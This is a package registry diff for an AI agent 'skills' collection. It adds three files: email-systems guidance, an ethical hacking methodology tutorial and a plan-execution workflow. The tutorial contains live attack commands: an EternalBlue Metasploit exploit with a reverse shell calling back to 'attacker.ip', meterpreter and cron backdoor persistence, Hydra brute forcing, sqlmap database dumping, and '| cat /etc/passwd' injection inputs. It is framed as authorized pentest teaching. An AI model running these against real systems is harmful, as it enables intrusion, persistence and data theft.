@namch/agent-assistant 1.0.0 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (168) hide show
  1. package/README.md +114 -522
  2. package/agents/backend-engineer.md +0 -8
  3. package/agents/brainstormer.md +0 -6
  4. package/agents/business-analyst.md +0 -5
  5. package/agents/database-architect.md +0 -6
  6. package/agents/debugger.md +0 -6
  7. package/agents/designer.md +0 -5
  8. package/agents/devops-engineer.md +0 -7
  9. package/agents/docs-manager.md +0 -6
  10. package/agents/frontend-engineer.md +0 -7
  11. package/agents/game-engineer.md +0 -7
  12. package/agents/mobile-engineer.md +0 -7
  13. package/agents/performance-engineer.md +0 -7
  14. package/agents/planner.md +0 -6
  15. package/agents/project-manager.md +0 -6
  16. package/agents/researcher.md +0 -5
  17. package/agents/reviewer.md +0 -6
  18. package/agents/scouter.md +0 -6
  19. package/agents/security-engineer.md +0 -7
  20. package/agents/tech-lead.md +0 -7
  21. package/agents/tester.md +0 -5
  22. package/cli/README.md +19 -10
  23. package/documents/business/business-features.md +1 -1
  24. package/documents/business/business-prd.md +4 -4
  25. package/documents/knowledge-architecture.md +1 -1
  26. package/documents/knowledge-domain.md +1 -1
  27. package/documents/knowledge-overview.md +14 -29
  28. package/documents/knowledge-source-base.md +14 -14
  29. package/package.json +1 -1
  30. package/rules/QUICK-REFERENCE.md +4 -1
  31. package/rules/SKILL-DISCOVERY.md +37 -14
  32. package/skills/active-directory-attacks/SKILL.md +383 -0
  33. package/skills/active-directory-attacks/references/advanced-attacks.md +382 -0
  34. package/skills/agent-evaluation/SKILL.md +64 -0
  35. package/skills/agent-memory-mcp/SKILL.md +82 -0
  36. package/skills/agent-memory-systems/SKILL.md +67 -0
  37. package/skills/agent-tool-builder/SKILL.md +53 -0
  38. package/skills/ai-agents-architect/SKILL.md +90 -0
  39. package/skills/ai-product/SKILL.md +54 -0
  40. package/skills/ai-wrapper-product/SKILL.md +273 -0
  41. package/skills/api-documentation-generator/SKILL.md +484 -0
  42. package/skills/api-fuzzing-bug-bounty/SKILL.md +433 -0
  43. package/skills/api-security-best-practices/SKILL.md +907 -0
  44. package/skills/autonomous-agent-patterns/SKILL.md +761 -0
  45. package/skills/autonomous-agents/SKILL.md +68 -0
  46. package/skills/aws-penetration-testing/SKILL.md +405 -0
  47. package/skills/aws-penetration-testing/references/advanced-aws-pentesting.md +469 -0
  48. package/skills/azure-functions/SKILL.md +42 -0
  49. package/skills/backend-dev-guidelines/SKILL.md +342 -0
  50. package/skills/backend-dev-guidelines/resources/architecture-overview.md +451 -0
  51. package/skills/backend-dev-guidelines/resources/async-and-errors.md +307 -0
  52. package/skills/backend-dev-guidelines/resources/complete-examples.md +638 -0
  53. package/skills/backend-dev-guidelines/resources/configuration.md +275 -0
  54. package/skills/backend-dev-guidelines/resources/database-patterns.md +224 -0
  55. package/skills/backend-dev-guidelines/resources/middleware-guide.md +213 -0
  56. package/skills/backend-dev-guidelines/resources/routing-and-controllers.md +756 -0
  57. package/skills/backend-dev-guidelines/resources/sentry-and-monitoring.md +336 -0
  58. package/skills/backend-dev-guidelines/resources/services-and-repositories.md +789 -0
  59. package/skills/backend-dev-guidelines/resources/testing-guide.md +235 -0
  60. package/skills/backend-dev-guidelines/resources/validation-patterns.md +754 -0
  61. package/skills/broken-authentication/SKILL.md +476 -0
  62. package/skills/bullmq-specialist/SKILL.md +57 -0
  63. package/skills/bun-development/SKILL.md +691 -0
  64. package/skills/burp-suite-testing/SKILL.md +380 -0
  65. package/skills/cloud-penetration-testing/SKILL.md +501 -0
  66. package/skills/cloud-penetration-testing/references/advanced-cloud-scripts.md +318 -0
  67. package/skills/computer-use-agents/SKILL.md +315 -0
  68. package/skills/content-creator/SKILL.md +248 -0
  69. package/skills/content-creator/assets/content_calendar_template.md +99 -0
  70. package/skills/content-creator/references/brand_guidelines.md +199 -0
  71. package/skills/content-creator/references/content_frameworks.md +534 -0
  72. package/skills/content-creator/references/social_media_optimization.md +317 -0
  73. package/skills/content-creator/scripts/brand_voice_analyzer.py +185 -0
  74. package/skills/content-creator/scripts/seo_optimizer.py +419 -0
  75. package/skills/context-window-management/SKILL.md +53 -0
  76. package/skills/conversation-memory/SKILL.md +61 -0
  77. package/skills/copy-editing/SKILL.md +439 -0
  78. package/skills/copywriting/SKILL.md +225 -0
  79. package/skills/crewai/SKILL.md +243 -0
  80. package/skills/discord-bot-architect/SKILL.md +277 -0
  81. package/skills/dispatching-parallel-agents/SKILL.md +180 -0
  82. package/skills/email-sequence/SKILL.md +925 -0
  83. package/skills/email-systems/SKILL.md +54 -0
  84. package/skills/ethical-hacking-methodology/SKILL.md +466 -0
  85. package/skills/executing-plans/SKILL.md +76 -0
  86. package/skills/file-path-traversal/SKILL.md +486 -0
  87. package/skills/finishing-a-development-branch/SKILL.md +200 -0
  88. package/skills/frontend-dev-guidelines/SKILL.md +359 -0
  89. package/skills/frontend-dev-guidelines/resources/common-patterns.md +331 -0
  90. package/skills/frontend-dev-guidelines/resources/complete-examples.md +872 -0
  91. package/skills/frontend-dev-guidelines/resources/component-patterns.md +502 -0
  92. package/skills/frontend-dev-guidelines/resources/data-fetching.md +767 -0
  93. package/skills/frontend-dev-guidelines/resources/file-organization.md +502 -0
  94. package/skills/frontend-dev-guidelines/resources/loading-and-error-states.md +501 -0
  95. package/skills/frontend-dev-guidelines/resources/performance.md +406 -0
  96. package/skills/frontend-dev-guidelines/resources/routing-guide.md +364 -0
  97. package/skills/frontend-dev-guidelines/resources/styling-guide.md +428 -0
  98. package/skills/frontend-dev-guidelines/resources/typescript-standards.md +418 -0
  99. package/skills/gcp-cloud-run/SKILL.md +288 -0
  100. package/skills/git-pushing/SKILL.md +33 -0
  101. package/skills/git-pushing/scripts/smart_commit.sh +19 -0
  102. package/skills/github-workflow-automation/SKILL.md +846 -0
  103. package/skills/html-injection-testing/SKILL.md +498 -0
  104. package/skills/idor-testing/SKILL.md +442 -0
  105. package/skills/inngest/SKILL.md +55 -0
  106. package/skills/javascript-mastery/SKILL.md +645 -0
  107. package/skills/kaizen/SKILL.md +730 -0
  108. package/skills/langfuse/SKILL.md +238 -0
  109. package/skills/langgraph/SKILL.md +287 -0
  110. package/skills/linux-privilege-escalation/SKILL.md +504 -0
  111. package/skills/llm-app-patterns/SKILL.md +760 -0
  112. package/skills/metasploit-framework/SKILL.md +478 -0
  113. package/skills/multi-agent-brainstorming/SKILL.md +256 -0
  114. package/skills/neon-postgres/SKILL.md +56 -0
  115. package/skills/nextjs-supabase-auth/SKILL.md +56 -0
  116. package/skills/nosql-expert/SKILL.md +111 -0
  117. package/skills/pentest-checklist/SKILL.md +334 -0
  118. package/skills/pentest-commands/SKILL.md +438 -0
  119. package/skills/plaid-fintech/SKILL.md +50 -0
  120. package/skills/planning-with-files/SKILL.md +211 -0
  121. package/skills/planning-with-files/examples.md +202 -0
  122. package/skills/planning-with-files/reference.md +218 -0
  123. package/skills/planning-with-files/scripts/check-complete.sh +44 -0
  124. package/skills/planning-with-files/scripts/init-session.sh +120 -0
  125. package/skills/planning-with-files/templates/findings.md +95 -0
  126. package/skills/planning-with-files/templates/progress.md +114 -0
  127. package/skills/planning-with-files/templates/task_plan.md +132 -0
  128. package/skills/privilege-escalation-methods/SKILL.md +333 -0
  129. package/skills/production-code-audit/SKILL.md +540 -0
  130. package/skills/prompt-caching/SKILL.md +61 -0
  131. package/skills/prompt-engineering/SKILL.md +171 -0
  132. package/skills/prompt-library/SKILL.md +322 -0
  133. package/skills/rag-engineer/SKILL.md +90 -0
  134. package/skills/rag-implementation/SKILL.md +63 -0
  135. package/skills/react-ui-patterns/SKILL.md +289 -0
  136. package/skills/red-team-tools/SKILL.md +310 -0
  137. package/skills/scanning-tools/SKILL.md +589 -0
  138. package/skills/shodan-reconnaissance/SKILL.md +503 -0
  139. package/skills/slack-bot-builder/SKILL.md +264 -0
  140. package/skills/smtp-penetration-testing/SKILL.md +500 -0
  141. package/skills/social-content/SKILL.md +807 -0
  142. package/skills/software-architecture/SKILL.md +75 -0
  143. package/skills/sql-injection-testing/SKILL.md +448 -0
  144. package/skills/sqlmap-database-pentesting/SKILL.md +400 -0
  145. package/skills/ssh-penetration-testing/SKILL.md +488 -0
  146. package/skills/stripe-integration/SKILL.md +69 -0
  147. package/skills/subagent-driven-development/SKILL.md +240 -0
  148. package/skills/subagent-driven-development/code-quality-reviewer-prompt.md +20 -0
  149. package/skills/subagent-driven-development/implementer-prompt.md +78 -0
  150. package/skills/subagent-driven-development/spec-reviewer-prompt.md +61 -0
  151. package/skills/tavily-web/SKILL.md +36 -0
  152. package/skills/telegram-bot-builder/SKILL.md +254 -0
  153. package/skills/test-driven-development/SKILL.md +371 -0
  154. package/skills/test-driven-development/testing-anti-patterns.md +299 -0
  155. package/skills/test-fixing/SKILL.md +119 -0
  156. package/skills/top-web-vulnerabilities/SKILL.md +543 -0
  157. package/skills/trigger-dev/SKILL.md +67 -0
  158. package/skills/twilio-communications/SKILL.md +295 -0
  159. package/skills/upstash-qstash/SKILL.md +68 -0
  160. package/skills/verification-before-completion/SKILL.md +139 -0
  161. package/skills/voice-agents/SKILL.md +68 -0
  162. package/skills/voice-ai-development/SKILL.md +302 -0
  163. package/skills/windows-privilege-escalation/SKILL.md +496 -0
  164. package/skills/wireshark-analysis/SKILL.md +497 -0
  165. package/skills/wordpress-penetration-testing/SKILL.md +485 -0
  166. package/skills/workflow-automation/SKILL.md +68 -0
  167. package/skills/xss-html-injection/SKILL.md +499 -0
  168. package/skills/zapier-make-patterns/SKILL.md +67 -0
@@ -0,0 +1,54 @@
1
+ ---
2
+ name: email-systems
3
+ description: "Email has the highest ROI of any marketing channel. $36 for every $1 spent. Yet most startups treat it as an afterthought - bulk blasts, no personalization, landing in spam folders. This skill covers transactional email that works, marketing automation that converts, deliverability that reaches inboxes, and the infrastructure decisions that scale. Use when: keywords, file_patterns, code_patterns."
4
+ source: vibeship-spawner-skills (Apache 2.0)
5
+ ---
6
+
7
+ # Email Systems
8
+
9
+ You are an email systems engineer who has maintained 99.9% deliverability
10
+ across millions of emails. You've debugged SPF/DKIM/DMARC, dealt with
11
+ blacklists, and optimized for inbox placement. You know that email is the
12
+ highest ROI channel when done right, and a spam folder nightmare when done
13
+ wrong. You treat deliverability as infrastructure, not an afterthought.
14
+
15
+ ## Patterns
16
+
17
+ ### Transactional Email Queue
18
+
19
+ Queue all transactional emails with retry logic and monitoring
20
+
21
+ ### Email Event Tracking
22
+
23
+ Track delivery, opens, clicks, bounces, and complaints
24
+
25
+ ### Template Versioning
26
+
27
+ Version email templates for rollback and A/B testing
28
+
29
+ ## Anti-Patterns
30
+
31
+ ### ❌ HTML email soup
32
+
33
+ **Why bad**: Email clients render differently. Outlook breaks everything.
34
+
35
+ ### ❌ No plain text fallback
36
+
37
+ **Why bad**: Some clients strip HTML. Accessibility issues. Spam signal.
38
+
39
+ ### ❌ Huge image emails
40
+
41
+ **Why bad**: Images blocked by default. Spam trigger. Slow loading.
42
+
43
+ ## ⚠️ Sharp Edges
44
+
45
+ | Issue | Severity | Solution |
46
+ |-------|----------|----------|
47
+ | Missing SPF, DKIM, or DMARC records | critical | # Required DNS records: |
48
+ | Using shared IP for transactional email | high | # Transactional email strategy: |
49
+ | Not processing bounce notifications | high | # Bounce handling requirements: |
50
+ | Missing or hidden unsubscribe link | critical | # Unsubscribe requirements: |
51
+ | Sending HTML without plain text alternative | medium | # Always send multipart: |
52
+ | Sending high volume from new IP immediately | high | # IP warm-up schedule: |
53
+ | Emailing people who did not opt in | critical | # Permission requirements: |
54
+ | Emails that are mostly or entirely images | medium | # Balance images and text: |
@@ -0,0 +1,466 @@
1
+ ---
2
+ name: Ethical Hacking Methodology
3
+ description: This skill should be used when the user asks to "learn ethical hacking", "understand penetration testing lifecycle", "perform reconnaissance", "conduct security scanning", "exploit vulnerabilities", or "write penetration test reports". It provides comprehensive ethical hacking methodology and techniques.
4
+ metadata:
5
+ author: zebbern
6
+ version: "1.1"
7
+ ---
8
+
9
+ # Ethical Hacking Methodology
10
+
11
+ ## Purpose
12
+
13
+ Master the complete penetration testing lifecycle from reconnaissance through reporting. This skill covers the five stages of ethical hacking methodology, essential tools, attack techniques, and professional reporting for authorized security assessments.
14
+
15
+ ## Prerequisites
16
+
17
+ ### Required Environment
18
+ - Kali Linux installed (persistent or live)
19
+ - Network access to authorized targets
20
+ - Written authorization from system owner
21
+
22
+ ### Required Knowledge
23
+ - Basic networking concepts
24
+ - Linux command-line proficiency
25
+ - Understanding of web technologies
26
+ - Familiarity with security concepts
27
+
28
+ ## Outputs and Deliverables
29
+
30
+ 1. **Reconnaissance Report** - Target information gathered
31
+ 2. **Vulnerability Assessment** - Identified weaknesses
32
+ 3. **Exploitation Evidence** - Proof of concept attacks
33
+ 4. **Final Report** - Executive and technical findings
34
+
35
+ ## Core Workflow
36
+
37
+ ### Phase 1: Understanding Hacker Types
38
+
39
+ Classification of security professionals:
40
+
41
+ **White Hat Hackers (Ethical Hackers)**
42
+ - Authorized security professionals
43
+ - Conduct penetration testing with permission
44
+ - Goal: Identify and fix vulnerabilities
45
+ - Also known as: penetration testers, security consultants
46
+
47
+ **Black Hat Hackers (Malicious)**
48
+ - Unauthorized system intrusions
49
+ - Motivated by profit, revenge, or notoriety
50
+ - Goal: Steal data, cause damage
51
+ - Also known as: crackers, criminal hackers
52
+
53
+ **Grey Hat Hackers (Hybrid)**
54
+ - May cross ethical boundaries
55
+ - Not malicious but may break rules
56
+ - Often disclose vulnerabilities publicly
57
+ - Mixed motivations
58
+
59
+ **Other Classifications**
60
+ - **Script Kiddies**: Use pre-made tools without understanding
61
+ - **Hacktivists**: Politically or socially motivated
62
+ - **Nation State**: Government-sponsored operatives
63
+ - **Coders**: Develop tools and exploits
64
+
65
+ ### Phase 2: Reconnaissance
66
+
67
+ Gather information without direct system interaction:
68
+
69
+ **Passive Reconnaissance**
70
+ ```bash
71
+ # WHOIS lookup
72
+ whois target.com
73
+
74
+ # DNS enumeration
75
+ nslookup target.com
76
+ dig target.com ANY
77
+ dig target.com MX
78
+ dig target.com NS
79
+
80
+ # Subdomain discovery
81
+ dnsrecon -d target.com
82
+
83
+ # Email harvesting
84
+ theHarvester -d target.com -b all
85
+ ```
86
+
87
+ **Google Hacking (OSINT)**
88
+ ```
89
+ # Find exposed files
90
+ site:target.com filetype:pdf
91
+ site:target.com filetype:xls
92
+ site:target.com filetype:doc
93
+
94
+ # Find login pages
95
+ site:target.com inurl:login
96
+ site:target.com inurl:admin
97
+
98
+ # Find directory listings
99
+ site:target.com intitle:"index of"
100
+
101
+ # Find configuration files
102
+ site:target.com filetype:config
103
+ site:target.com filetype:env
104
+ ```
105
+
106
+ **Google Hacking Database Categories:**
107
+ - Files containing passwords
108
+ - Sensitive directories
109
+ - Web server detection
110
+ - Vulnerable servers
111
+ - Error messages
112
+ - Login portals
113
+
114
+ **Social Media Reconnaissance**
115
+ - LinkedIn: Organizational charts, technologies used
116
+ - Twitter: Company announcements, employee info
117
+ - Facebook: Personal information, relationships
118
+ - Job postings: Technology stack revelations
119
+
120
+ ### Phase 3: Scanning
121
+
122
+ Active enumeration of target systems:
123
+
124
+ **Host Discovery**
125
+ ```bash
126
+ # Ping sweep
127
+ nmap -sn 192.168.1.0/24
128
+
129
+ # ARP scan (local network)
130
+ arp-scan -l
131
+
132
+ # Discover live hosts
133
+ nmap -sP 192.168.1.0/24
134
+ ```
135
+
136
+ **Port Scanning**
137
+ ```bash
138
+ # TCP SYN scan (stealth)
139
+ nmap -sS target.com
140
+
141
+ # Full TCP connect scan
142
+ nmap -sT target.com
143
+
144
+ # UDP scan
145
+ nmap -sU target.com
146
+
147
+ # All ports scan
148
+ nmap -p- target.com
149
+
150
+ # Top 1000 ports with service detection
151
+ nmap -sV target.com
152
+
153
+ # Aggressive scan (OS, version, scripts)
154
+ nmap -A target.com
155
+ ```
156
+
157
+ **Service Enumeration**
158
+ ```bash
159
+ # Specific service scripts
160
+ nmap --script=http-enum target.com
161
+ nmap --script=smb-enum-shares target.com
162
+ nmap --script=ftp-anon target.com
163
+
164
+ # Vulnerability scanning
165
+ nmap --script=vuln target.com
166
+ ```
167
+
168
+ **Common Port Reference**
169
+ | Port | Service | Notes |
170
+ |------|---------|-------|
171
+ | 21 | FTP | File transfer |
172
+ | 22 | SSH | Secure shell |
173
+ | 23 | Telnet | Unencrypted remote |
174
+ | 25 | SMTP | Email |
175
+ | 53 | DNS | Name resolution |
176
+ | 80 | HTTP | Web |
177
+ | 443 | HTTPS | Secure web |
178
+ | 445 | SMB | Windows shares |
179
+ | 3306 | MySQL | Database |
180
+ | 3389 | RDP | Remote desktop |
181
+
182
+ ### Phase 4: Vulnerability Analysis
183
+
184
+ Identify exploitable weaknesses:
185
+
186
+ **Automated Scanning**
187
+ ```bash
188
+ # Nikto web scanner
189
+ nikto -h http://target.com
190
+
191
+ # OpenVAS (command line)
192
+ omp -u admin -w password --xml="<get_tasks/>"
193
+
194
+ # Nessus (via API)
195
+ nessuscli scan --target target.com
196
+ ```
197
+
198
+ **Web Application Testing (OWASP)**
199
+ - SQL Injection
200
+ - Cross-Site Scripting (XSS)
201
+ - Broken Authentication
202
+ - Security Misconfiguration
203
+ - Sensitive Data Exposure
204
+ - XML External Entities (XXE)
205
+ - Broken Access Control
206
+ - Insecure Deserialization
207
+ - Using Components with Known Vulnerabilities
208
+ - Insufficient Logging & Monitoring
209
+
210
+ **Manual Techniques**
211
+ ```bash
212
+ # Directory brute forcing
213
+ gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
214
+
215
+ # Subdomain enumeration
216
+ gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt
217
+
218
+ # Web technology fingerprinting
219
+ whatweb target.com
220
+ ```
221
+
222
+ ### Phase 5: Exploitation
223
+
224
+ Actively exploit discovered vulnerabilities:
225
+
226
+ **Metasploit Framework**
227
+ ```bash
228
+ # Start Metasploit
229
+ msfconsole
230
+
231
+ # Search for exploits
232
+ msf> search type:exploit name:smb
233
+
234
+ # Use specific exploit
235
+ msf> use exploit/windows/smb/ms17_010_eternalblue
236
+
237
+ # Set target
238
+ msf> set RHOSTS target.com
239
+
240
+ # Set payload
241
+ msf> set PAYLOAD windows/meterpreter/reverse_tcp
242
+ msf> set LHOST attacker.ip
243
+
244
+ # Execute
245
+ msf> exploit
246
+ ```
247
+
248
+ **Password Attacks**
249
+ ```bash
250
+ # Hydra brute force
251
+ hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
252
+ hydra -L users.txt -P passwords.txt ftp://target.com
253
+
254
+ # John the Ripper
255
+ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
256
+ ```
257
+
258
+ **Web Exploitation**
259
+ ```bash
260
+ # SQLMap for SQL injection
261
+ sqlmap -u "http://target.com/page.php?id=1" --dbs
262
+ sqlmap -u "http://target.com/page.php?id=1" -D database --tables
263
+
264
+ # XSS testing
265
+ # Manual: <script>alert('XSS')</script>
266
+
267
+ # Command injection testing
268
+ # ; ls -la
269
+ # | cat /etc/passwd
270
+ ```
271
+
272
+ ### Phase 6: Maintaining Access
273
+
274
+ Establish persistent access:
275
+
276
+ **Backdoors**
277
+ ```bash
278
+ # Meterpreter persistence
279
+ meterpreter> run persistence -X -i 30 -p 4444 -r attacker.ip
280
+
281
+ # SSH key persistence
282
+ # Add attacker's public key to ~/.ssh/authorized_keys
283
+
284
+ # Cron job persistence
285
+ echo "* * * * * /tmp/backdoor.sh" >> /etc/crontab
286
+ ```
287
+
288
+ **Privilege Escalation**
289
+ ```bash
290
+ # Linux enumeration
291
+ linpeas.sh
292
+ linux-exploit-suggester.sh
293
+
294
+ # Windows enumeration
295
+ winpeas.exe
296
+ windows-exploit-suggester.py
297
+
298
+ # Check SUID binaries (Linux)
299
+ find / -perm -4000 2>/dev/null
300
+
301
+ # Check sudo permissions
302
+ sudo -l
303
+ ```
304
+
305
+ **Covering Tracks (Ethical Context)**
306
+ - Document all actions taken
307
+ - Maintain logs for reporting
308
+ - Avoid unnecessary system changes
309
+ - Clean up test files and backdoors
310
+
311
+ ### Phase 7: Reporting
312
+
313
+ Document findings professionally:
314
+
315
+ **Report Structure**
316
+ 1. **Executive Summary**
317
+ - High-level findings
318
+ - Business impact
319
+ - Risk ratings
320
+ - Remediation priorities
321
+
322
+ 2. **Technical Findings**
323
+ - Vulnerability details
324
+ - Proof of concept
325
+ - Screenshots/evidence
326
+ - Affected systems
327
+
328
+ 3. **Risk Ratings**
329
+ - Critical: Immediate action required
330
+ - High: Address within 24-48 hours
331
+ - Medium: Address within 1 week
332
+ - Low: Address within 1 month
333
+ - Informational: Best practice recommendations
334
+
335
+ 4. **Remediation Recommendations**
336
+ - Specific fixes for each finding
337
+ - Short-term mitigations
338
+ - Long-term solutions
339
+ - Resource requirements
340
+
341
+ 5. **Appendices**
342
+ - Detailed scan outputs
343
+ - Tool configurations
344
+ - Testing timeline
345
+ - Scope and methodology
346
+
347
+ ### Phase 8: Common Attack Types
348
+
349
+ **Phishing**
350
+ - Email-based credential theft
351
+ - Fake login pages
352
+ - Malicious attachments
353
+ - Social engineering component
354
+
355
+ **Malware Types**
356
+ - **Virus**: Self-replicating, needs host file
357
+ - **Worm**: Self-propagating across networks
358
+ - **Trojan**: Disguised as legitimate software
359
+ - **Ransomware**: Encrypts files for ransom
360
+ - **Rootkit**: Hidden system-level access
361
+ - **Spyware**: Monitors user activity
362
+
363
+ **Network Attacks**
364
+ - Man-in-the-Middle (MITM)
365
+ - ARP Spoofing
366
+ - DNS Poisoning
367
+ - DDoS (Distributed Denial of Service)
368
+
369
+ ### Phase 9: Kali Linux Setup
370
+
371
+ Install penetration testing platform:
372
+
373
+ **Hard Disk Installation**
374
+ 1. Download ISO from kali.org
375
+ 2. Boot from installation media
376
+ 3. Select "Graphical Install"
377
+ 4. Configure language, location, keyboard
378
+ 5. Set hostname and root password
379
+ 6. Partition disk (Guided - use entire disk)
380
+ 7. Install GRUB bootloader
381
+ 8. Reboot and login
382
+
383
+ **Live USB (Persistent)**
384
+ ```bash
385
+ # Create bootable USB
386
+ dd if=kali-linux.iso of=/dev/sdb bs=512k status=progress
387
+
388
+ # Create persistence partition
389
+ gparted /dev/sdb
390
+ # Add ext4 partition labeled "persistence"
391
+
392
+ # Configure persistence
393
+ mkdir /mnt/usb
394
+ mount /dev/sdb2 /mnt/usb
395
+ echo "/ union" > /mnt/usb/persistence.conf
396
+ umount /mnt/usb
397
+ ```
398
+
399
+ ### Phase 10: Ethical Guidelines
400
+
401
+ **Legal Requirements**
402
+ - Obtain written authorization
403
+ - Define scope clearly
404
+ - Document all testing activities
405
+ - Report all findings to client
406
+ - Maintain confidentiality
407
+
408
+ **Professional Conduct**
409
+ - Work ethically with integrity
410
+ - Respect privacy of data accessed
411
+ - Avoid unnecessary system damage
412
+ - Execute planned tests only
413
+ - Never use findings for personal gain
414
+
415
+ ## Quick Reference
416
+
417
+ ### Penetration Testing Lifecycle
418
+
419
+ | Stage | Purpose | Key Tools |
420
+ |-------|---------|-----------|
421
+ | Reconnaissance | Gather information | theHarvester, WHOIS, Google |
422
+ | Scanning | Enumerate targets | Nmap, Nikto, Gobuster |
423
+ | Exploitation | Gain access | Metasploit, SQLMap, Hydra |
424
+ | Maintaining Access | Persistence | Meterpreter, SSH keys |
425
+ | Reporting | Document findings | Report templates |
426
+
427
+ ### Essential Commands
428
+
429
+ | Command | Purpose |
430
+ |---------|---------|
431
+ | `nmap -sV target` | Port and service scan |
432
+ | `nikto -h target` | Web vulnerability scan |
433
+ | `msfconsole` | Start Metasploit |
434
+ | `hydra -l user -P list ssh://target` | SSH brute force |
435
+ | `sqlmap -u "url?id=1" --dbs` | SQL injection |
436
+
437
+ ## Constraints and Limitations
438
+
439
+ ### Authorization Required
440
+ - Never test without written permission
441
+ - Stay within defined scope
442
+ - Report unauthorized access attempts
443
+
444
+ ### Professional Standards
445
+ - Follow rules of engagement
446
+ - Maintain client confidentiality
447
+ - Document methodology used
448
+ - Provide actionable recommendations
449
+
450
+ ## Troubleshooting
451
+
452
+ ### Scans Blocked
453
+
454
+ **Solutions:**
455
+ 1. Use slower scan rates
456
+ 2. Try different scanning techniques
457
+ 3. Use proxy or VPN
458
+ 4. Fragment packets
459
+
460
+ ### Exploits Failing
461
+
462
+ **Solutions:**
463
+ 1. Verify target vulnerability exists
464
+ 2. Check payload compatibility
465
+ 3. Adjust exploit parameters
466
+ 4. Try alternative exploits
@@ -0,0 +1,76 @@
1
+ ---
2
+ name: executing-plans
3
+ description: Use when you have a written implementation plan to execute in a separate session with review checkpoints
4
+ ---
5
+
6
+ # Executing Plans
7
+
8
+ ## Overview
9
+
10
+ Load plan, review critically, execute tasks in batches, report for review between batches.
11
+
12
+ **Core principle:** Batch execution with checkpoints for architect review.
13
+
14
+ **Announce at start:** "I'm using the executing-plans skill to implement this plan."
15
+
16
+ ## The Process
17
+
18
+ ### Step 1: Load and Review Plan
19
+ 1. Read plan file
20
+ 2. Review critically - identify any questions or concerns about the plan
21
+ 3. If concerns: Raise them with your human partner before starting
22
+ 4. If no concerns: Create TodoWrite and proceed
23
+
24
+ ### Step 2: Execute Batch
25
+ **Default: First 3 tasks**
26
+
27
+ For each task:
28
+ 1. Mark as in_progress
29
+ 2. Follow each step exactly (plan has bite-sized steps)
30
+ 3. Run verifications as specified
31
+ 4. Mark as completed
32
+
33
+ ### Step 3: Report
34
+ When batch complete:
35
+ - Show what was implemented
36
+ - Show verification output
37
+ - Say: "Ready for feedback."
38
+
39
+ ### Step 4: Continue
40
+ Based on feedback:
41
+ - Apply changes if needed
42
+ - Execute next batch
43
+ - Repeat until complete
44
+
45
+ ### Step 5: Complete Development
46
+
47
+ After all tasks complete and verified:
48
+ - Announce: "I'm using the finishing-a-development-branch skill to complete this work."
49
+ - **REQUIRED SUB-SKILL:** Use superpowers:finishing-a-development-branch
50
+ - Follow that skill to verify tests, present options, execute choice
51
+
52
+ ## When to Stop and Ask for Help
53
+
54
+ **STOP executing immediately when:**
55
+ - Hit a blocker mid-batch (missing dependency, test fails, instruction unclear)
56
+ - Plan has critical gaps preventing starting
57
+ - You don't understand an instruction
58
+ - Verification fails repeatedly
59
+
60
+ **Ask for clarification rather than guessing.**
61
+
62
+ ## When to Revisit Earlier Steps
63
+
64
+ **Return to Review (Step 1) when:**
65
+ - Partner updates the plan based on your feedback
66
+ - Fundamental approach needs rethinking
67
+
68
+ **Don't force through blockers** - stop and ask.
69
+
70
+ ## Remember
71
+ - Review plan critically first
72
+ - Follow plan steps exactly
73
+ - Don't skip verifications
74
+ - Reference skills when plan says to
75
+ - Between batches: just report and wait
76
+ - Stop when blocked, don't guess